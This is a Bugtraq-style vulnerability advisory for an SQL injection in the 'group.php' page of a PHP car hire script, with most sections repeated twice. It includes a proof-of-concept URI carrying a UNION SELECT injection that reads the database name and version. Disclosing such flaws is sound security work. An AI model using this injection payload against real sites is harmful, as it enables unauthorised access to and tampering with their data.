PHP car hire script 'group.php' SQL Injection Vulnerability
BID:40688
Info
PHP car hire script 'group.php' SQL Injection Vulnerability
| Bugtraq ID: | 40688 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 06 2010 12:00AM |
| Updated: | Jun 06 2010 12:00AM |
| Credit: | Sid3^effects |
| Vulnerable: |
PHP car hire script PHP car hire script 0 |
| Not Vulnerable: | |
Discussion
PHP car hire script 'group.php' SQL Injection Vulnerability
PHP car hire script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP car hire script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
PHP car hire script 'group.php' SQL Injection Vulnerability
Attackers can exploit this issue with a web browser.
The following example URI is available:
http://www.example.com/group.php?id=-2+union+select+1,database(),3,4,5,6,7,8,version(),10,11,12--
Attackers can exploit this issue with a web browser.
The following example URI is available:
http://www.example.com/group.php?id=-2+union+select+1,database(),3,4,5,6,7,8,version(),10,11,12--
Solution / Fix
PHP car hire script 'group.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP car hire script 'group.php' SQL Injection Vulnerability
References:
References:
- PHP car hire script Homepage (PHP car hire script)